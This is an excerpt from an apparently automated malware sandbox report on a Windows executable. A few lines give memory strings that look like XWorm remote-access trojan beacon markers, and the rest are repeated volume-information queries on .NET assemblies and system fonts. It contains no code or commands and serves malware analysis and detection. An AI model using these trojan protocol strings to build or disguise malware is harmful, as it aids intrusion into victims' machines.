              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\tq@\tq-PING!<Xwormmm>Program Manager<Xwormmm>2008415
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035B3000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\tq@\tq'PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\tq@\tq-PING!<Xwormmm>Program Manager<Xwormmm>1795112
              Source: 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.0000000003563000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000035B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-tq
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Users\user\Desktop\9758xBqgE1azKnB.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
